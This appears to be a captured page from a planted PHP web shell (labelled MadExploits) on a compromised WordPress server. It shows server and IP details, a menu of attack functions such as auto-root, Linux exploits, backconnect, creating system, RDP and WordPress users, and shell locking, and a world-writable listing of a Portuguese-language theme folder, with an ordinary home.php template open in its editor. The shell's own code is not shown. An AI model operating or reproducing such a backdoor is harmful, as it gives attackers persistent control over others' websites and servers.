Linux 700ba4e1d92d 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Apache/2.4.67 (Debian)
: 172.18.0.2 | : 216.73.217.30
Cant Read [ /etc/named.conf ]
8.2.31
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
wp-content /
themes /
mpcma-theme /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxrwx
template-parts
[ DIR ]
drwxrwxrwx
.DS_Store
6
KB
-rwxrwxrwx
archive-ato_normativo.php
12.96
KB
-rwxrwxrwx
archive-parecer.php
1.24
KB
-rwxrwxrwx
footer.php
3.58
KB
-rwxrwxrwx
front-page.php
7.12
KB
-rwxrwxrwx
functions.php
9.54
KB
-rwxrwxrwx
header.php
2.19
KB
-rwxrwxrwx
home.php
1.27
KB
-rwxrwxrwx
index.php
7.07
KB
-rwxrwxrwx
page-acesso-a-informacao.php
3.61
KB
-rwxrwxrwx
page-contato.php
3.53
KB
-rwxrwxrwx
page-institucional.php
3.79
KB
-rwxrwxrwx
page-mapa-do-site.php
2.51
KB
-rwxrwxrwx
page.php
693
B
-rwxrwxrwx
screenshot-readme.txt
73
B
-rwxrwxrwx
single.php
876
B
-rwxrwxrwx
style.css
499
B
-rwxrwxrwx
taxonomy-tipo_ato.php
2.64
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : home.php
<?php get_header(); ?> <div class="page-hero"> <h1>Notícias</h1> <p class="breadcrumb"><a href="<?php echo home_url(); ?>">Início</a> › Notícias</p> </div> <div class="page-content"> <div class="noticias-list"> <?php if ( have_posts() ) : while ( have_posts() ) : the_post(); ?> <article class="noticia-full"> <div class="noticia-full-img"> <?php if ( has_post_thumbnail() ) : ?> <?php the_post_thumbnail('noticia-lista'); ?> <?php else : ?> <div style="width:100%;height:100%;background:linear-gradient(135deg,#7B1D1D,#9b2626);"></div> <?php endif; ?> </div> <div class="noticia-body"> <div class="noticia-date"><?php echo get_the_date('d \d\e M \d\e Y'); ?></div> <h2><a href="<?php the_permalink(); ?>"><?php the_title(); ?></a></h2> <p><?php the_excerpt(); ?></p> <a href="<?php the_permalink(); ?>" class="read-more"> LEIA MAIS <span class="read-more-arrow">›</span> </a> </div> </article> <?php endwhile; else : ?> <p>Nenhuma notícia encontrada.</p> <?php endif; ?> </div> <div style="margin-top:32px;"> <?php the_posts_pagination(['mid_size' => 2]); ?> </div> </div> <?php get_footer(); ?>
Close